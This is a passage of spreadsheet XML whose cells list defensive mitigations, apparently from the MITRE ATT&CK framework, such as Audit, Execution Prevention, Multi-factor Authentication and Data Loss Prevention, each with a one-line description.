Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1044
Restrict Library Loading
Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1013
Application Developer Guidance
This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
M1052
User Account Control
Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1050
Exploit Protection
Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1052
User Account Control
Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1013
Application Developer Guidance
This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1029
Remote Data Storage
Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1039
Environment Variable Permissions
Prevent modification of environment variables by unauthorized users and groups.
M1029
Remote Data Storage
Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1029
Remote Data Storage
Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1029
Remote Data Storage
Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1029
Remote Data Storage
Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1039
Environment Variable Permissions
Prevent modification of environment variables by unauthorized users and groups.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1019
Threat Intelligence Program
A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1050
Exploit Protection
Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1043
Credential Access Protection
Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1046
Boot Integrity
Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.
M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1043
Credential Access Protection
Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1050
Exploit Protection
Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
M1019
Threat Intelligence Program
A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1030
Network Segmentation
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t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1030
Network Segmentation
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t>
  </si>
  <si>
    <t xml:space="preserve">M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1030
Network Segmentation
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M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1033
Limit Software Installation
Block users or groups from installing unapproved software.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1049
Antivirus/Antimalware
Use signatures or heuristics to detect malicious software.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1050
Exploit Protection
Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1045
Code Signing
Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1013
Application Developer Guidance
This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1033
Limit Software Installation
Block users or groups from installing unapproved software.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1030
Network Segmentation
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M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1029
Remote Data Storage
Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1057
Data Loss Prevention
Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1030
Network Segmentation
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M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1057
Data Loss Prevention
Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1030
Network Segmentation
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t>
  </si>
  <si>
    <t xml:space="preserve">M1057
Data Loss Prevention
Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1057
Data Loss Prevention
Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1057
Data Loss Prevention
Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1034
Limit Hardware Installation
Block users or groups from installing or using unapproved hardware on systems, including USB devices.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
